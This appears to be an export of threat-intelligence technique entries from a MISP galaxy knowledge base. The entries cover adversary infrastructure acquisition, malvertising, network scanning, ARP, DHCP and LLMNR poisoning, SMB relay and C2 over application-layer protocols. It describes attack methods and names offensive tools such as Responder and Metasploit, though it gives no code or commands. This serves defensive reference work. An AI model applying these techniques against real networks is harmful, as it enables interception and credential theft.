Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.<sup>[[Norton Botnet](https://app.tidalcyber.com/references/f97427f1-ea16-4e92-a4a2-4d62a800df15)]</sup> Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or Distributed Denial of Service (DDoS).<sup>[[Imperva DDoS for Hire](https://app.tidalcyber.com/references/86f87ec6-058e-45a7-9314-0579a2b4e8f2)]</sup><sup>[[Krebs-Anna](https://app.tidalcyber.com/references/028b7582-be46-4642-9e36-b781cac66340)]</sup><sup>[[Krebs-Bazaar](https://app.tidalcyber.com/references/b46efda2-18e0-451e-b945-28421c2d5274)]</sup><sup>[[Krebs-Booter](https://app.tidalcyber.com/references/d29a88ae-273b-439e-8808-dc9931f1ff72)]</sup>

The tag is: misp-galaxy:technique="Botnet - Duplicate"

DNS Server

Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://app.tidalcyber.com/technique/8a7afe43-b814-41b3-8bd8-e1301b8ba5b4)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.

By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://app.tidalcyber.com/technique/5c6c3492-5dbc-43ee-a3f2-ba1976d3b379)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.<sup>[[Unit42 DNS Mar 2019](https://app.tidalcyber.com/references/e41fde80-5ced-4f66-9852-392d1ef79520)]</sup>

The tag is: misp-galaxy:technique="DNS Server"

Domains - Duplicate

Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), and Command and Control.<sup>[[CISA MSS Sep 2020](https://app.tidalcyber.com/references/ffe613e3-b528-42bf-81d5-4d8de38b3457)]</sup> Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).<sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup><sup>[[PaypalScam](https://app.tidalcyber.com/references/bcea7897-6cb2-467d-ad3b-ffd20badf19f)]</sup> Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.<sup>[[CISA IDN ST05-016](https://app.tidalcyber.com/references/3cc2c996-10e9-4e25-999c-21dc2c69e4af)]</sup><sup>[[tt_httrack_fake_domains](https://app.tidalcyber.com/references/9bdda422-dbf7-4b70-a7b1-9e3ad658c239)]</sup><sup>[[tt_obliqueRAT](https://app.tidalcyber.com/references/be1e3092-1981-457b-ae76-b55b057e1d73)]</sup><sup>[[httrack_unhcr](https://app.tidalcyber.com/references/a4a3fd3d-1c13-40e5-b462-fa69a1861986)]</sup><sup>[[lazgroup_idn_phishing](https://app.tidalcyber.com/references/83de363d-b575-4851-9c2d-a78f504cf754)]</sup>

Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.<sup>[[Categorisation_not_boundary](https://app.tidalcyber.com/references/3c320f38-e691-46f7-a20d-58b024ea2fa2)]</sup><sup>[[Domain_Steal_CC](https://app.tidalcyber.com/references/30ab5d35-db9b-401f-89cb-73f2c7fea060)]</sup><sup>[[Redirectors_Domain_Fronting](https://app.tidalcyber.com/references/42c81d97-b6ee-458e-bff3-e8c4de882cd6)]</sup><sup>[[bypass_webproxy_filtering](https://app.tidalcyber.com/references/fab84597-99a0-4560-8c8c-11fd8c01d5fa)]</sup>

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:technique="Domains - Duplicate"

Malvertising

Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.<sup>[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)]</sup> Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites.

Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.<sup>[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)]</sup><sup>[[FBI-search](https://app.tidalcyber.com/references/deea5b42-bfab-50af-8d85-cc04fd317a82)]</sup> Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.<sup>[[sentinelone-malvertising](https://app.tidalcyber.com/references/7989f0de-90b8-5e6d-bc20-1764610d1568)]</sup>

Malvertising may be used to support [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) and [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system’s web browser.<sup>[[BBC-malvertising](https://app.tidalcyber.com/references/425775e4-2948-5a73-a2d8-9a3edca74b1b)]</sup>

Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.<sup>[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)]</sup> Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.<sup>[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)]</sup>

The tag is: misp-galaxy:technique="Malvertising"

Server - Duplicate

Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or email servers to support [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) operations. Instead of compromising a third-party [Server](https://app.tidalcyber.com/technique/ce71e252-3403-4287-a0b5-9328fa88af96) or renting a [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.<sup>[[NYTStuxnet](https://app.tidalcyber.com/references/38b0cf78-88d0-487f-b2b0-81264f457dd0)]</sup>

The tag is: misp-galaxy:technique="Server - Duplicate"

Serverless - Duplicate

Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) traffic to an adversary-owned command and control server.<sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup><sup>[[AWS Lambda Redirector](https://app.tidalcyber.com/references/9ba87a5d-a140-4959-9905-c4a80e684d56)]</sup> As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.<sup>[[Detecting Command & Control in the Cloud](https://app.tidalcyber.com/references/b12e0288-48cd-46ec-8305-0f4d050782f2)]</sup><sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup>

The tag is: misp-galaxy:technique="Serverless - Duplicate"

Virtual Private Server - Duplicate

Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.

Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.<sup>[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]</sup>

The tag is: misp-galaxy:technique="Virtual Private Server - Duplicate"

Web Services - Duplicate

Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)), [Exfiltration Over Web Service](https://app.tidalcyber.com/technique/66768217-acdd-4b52-902f-e29483630ad6), or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

The tag is: misp-galaxy:technique="Web Services - Duplicate"

Acquire Infrastructure

Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.<sup>[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]</sup> Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b), including from residential proxy services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[FBI Proxies Credential Stuffing](https://app.tidalcyber.com/references/17f9b7b0-3e1a-5d75-9030-da79fcccdb49)]</sup><sup>[[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)]</sup> Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

The tag is: misp-galaxy:technique="Acquire Infrastructure"

Scanning IP Blocks

Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.

Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://app.tidalcyber.com/technique/58776ca9-0c54-487f-afcc-e7e5b661bd54), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.<sup>[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Scanning IP Blocks"

Vulnerability Scanning

Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to [Gather Victim Host Information](https://app.tidalcyber.com/technique/4acf57da-73c1-4555-a86a-38ea4a8b962d) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.<sup>[[OWASP Vuln Scanning](https://app.tidalcyber.com/references/039c0947-1976-4eb8-bb26-4c74dceea7f0)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).

The tag is: misp-galaxy:technique="Vulnerability Scanning"

Wordlist Scanning

Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578), or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).

For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.<sup>[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]</sup> This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a) or [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c)).

As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.<sup>[[S3Recon GitHub](https://app.tidalcyber.com/references/803c51be-a54e-4fab-8ea0-c6bef18e84d3)]</sup><sup>[[GCPBucketBrute](https://app.tidalcyber.com/references/d956e1f6-37ca-4352-b275-84c174888b88)]</sup> Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://app.tidalcyber.com/technique/77069b3f-9e42-4f1b-894f-8df568233df2) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally.

The tag is: misp-galaxy:technique="Wordlist Scanning"

Active Scanning

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.<sup>[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)]</sup><sup>[[OWASP Fingerprinting](https://app.tidalcyber.com/references/ec89a48b-3b00-4928-8450-d2fbd307817f)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).

The tag is: misp-galaxy:technique="Active Scanning"

ARP Cache Poisoning

Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) or [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243).

The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.<sup>[[RFC826 ARP](https://app.tidalcyber.com/references/8eef2b68-f932-4cba-8646-bff9a7848532)]</sup> Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.

An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.

The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.<sup>[[Sans ARP Spoofing Aug 2003](https://app.tidalcyber.com/references/1f9f5bfc-c044-4046-8586-39163a305c1e)]</sup><sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup>

Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.<sup>[[Sans ARP Spoofing Aug 2003](https://app.tidalcyber.com/references/1f9f5bfc-c044-4046-8586-39163a305c1e)]</sup>

The tag is: misp-galaxy:technique="ARP Cache Poisoning"

DHCP Spoofing

Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) or [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243).

DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.<sup>[[rfc2131](https://app.tidalcyber.com/references/b16bd2d5-162b-44cb-a812-7becd6684021)]</sup> The typical server-client interaction is as follows:

  1. The client broadcasts a DISCOVER message.

  2. The server responds with an OFFER message, which includes an available network address.

  3. The client broadcasts a REQUEST message, which includes the network address offered.

  4. The server acknowledges with an ACK message and the client receives the network configuration parameters.

Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.<sup>[[new_rogue_DHCP_serv_malware](https://app.tidalcyber.com/references/8e0a8a9a-9b1f-4141-b595-80b98daf6b68)]</sup><sup>[[w32.tidserv.g](https://app.tidalcyber.com/references/9d4ac51b-d870-43e8-bc6f-d7159343b00c)]</sup> Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.

DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a <code>INFORMATION-REQUEST (code 11)</code> message to the <code>All_DHCP_Relay_Agents_and_Servers</code> multicast address.<sup>[[rfc3315](https://app.tidalcyber.com/references/9349f864-79e9-4481-ad77-44099621795a)]</sup> Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.

Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://app.tidalcyber.com/technique/03619027-8a54-4cb2-8f1d-38d476edbdd8)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.

The tag is: misp-galaxy:technique="DHCP Spoofing"

LLMNR/NBT-NS Poisoning and SMB Relay

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. <sup>[[Wikipedia LLMNR](https://app.tidalcyber.com/references/e06d8b82-f61d-49fc-8120-b6d9e5864cc8)]</sup><sup>[[TechNet NetBIOS](https://app.tidalcyber.com/references/f756ee2e-2e79-41df-bf9f-6492a9708663)]</sup>

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) and crack the hashes offline through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) to obtain the plaintext passwords.

In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.<sup>[[byt3bl33d3r NTLM Relaying](https://app.tidalcyber.com/references/34deeec2-6edc-492c-bb35-5ccb1dc8e4df)]</sup><sup>[[Secure Ideas SMB Relay](https://app.tidalcyber.com/references/ac4b2e91-f338-44c3-8950-435102136991)]</sup> Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. 

Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder]([GitHub NBNSpoof(https://app.tidalcyber.com/references/4119091a-96f8-441c-b66f-ee0d9013d7ca)]</sup><sup>[[Rapid7 LLMNR Spoofer](https://app.tidalcyber.com/references/229b04b6-98ca-4e6f-9917-a26cfe0a7f0d)]</sup><sup>[[GitHub Responder](https://app.tidalcyber.com/references/3ef681a9-4ab0-420b-9d1a-b8152c50b3ca)]</sup>

The tag is: misp-galaxy:technique="LLMNR/NBT-NS Poisoning and SMB Relay"

Adversary-in-the-Middle

Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243), or replay attacks ([Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.<sup>[[Rapid7 MiTM Basics](https://app.tidalcyber.com/references/33b25966-0ab9-4cc6-9702-62263a23af9c)]</sup>

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.<sup>[[ttint_rat](https://app.tidalcyber.com/references/f3e60cae-3225-4800-bc15-cb46ff715061)]</sup><sup>[[dns_changer_trojans](https://app.tidalcyber.com/references/082a0fde-d9f9-45f2-915d-f14c77b62254)]</sup><sup>[[ad_blocker_with_miner](https://app.tidalcyber.com/references/8e30f71e-80b8-4662-bc95-bf3cf7cfcf40)]</sup> Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup> [Downgrade Attack](https://app.tidalcyber.com/technique/257fffe4-d17b-4e63-a41c-8388936d6215)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.<sup>[[mitm_tls_downgrade_att](https://app.tidalcyber.com/references/af907fe1-1e37-4f44-8ad4-fcc3826ee6fb)]</sup><sup>[[taxonomy_downgrade_att_tls](https://app.tidalcyber.com/references/4459076e-7c79-4855-9091-5aabd274f586)]</sup><sup>[[tlseminar_downgrade_att](https://app.tidalcyber.com/references/8b5d46bf-fb4e-4ecd-b8a9-9c084c1864a3)]</sup>

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) and/or in support of a [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).

The tag is: misp-galaxy:technique="Adversary-in-the-Middle"

DNS - Duplicate

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.<sup>[[PAN DNS Tunneling](https://app.tidalcyber.com/references/efe1c443-475b-45fc-8d33-5bf3bdf941c5)]</sup><sup>[[Medium DnsTunneling](https://app.tidalcyber.com/references/f31de733-406c-4348-b3fe-bdc30d707277)]</sup>

The tag is: misp-galaxy:technique="DNS - Duplicate"

File Transfer Protocols

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:technique="File Transfer Protocols"

Mail Protocols

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:technique="Mail Protocols"

Web Protocols

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S<sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup> and WebSocket<sup>[[Brazking-Websockets](https://app.tidalcyber.com/references/fa813afd-b8f0-535b-9108-6d3d3989b6b9)]</sup> that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:technique="Web Protocols"

Application Layer Protocol

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

The tag is: misp-galaxy:technique="Application Layer Protocol"

Application Window Discovery

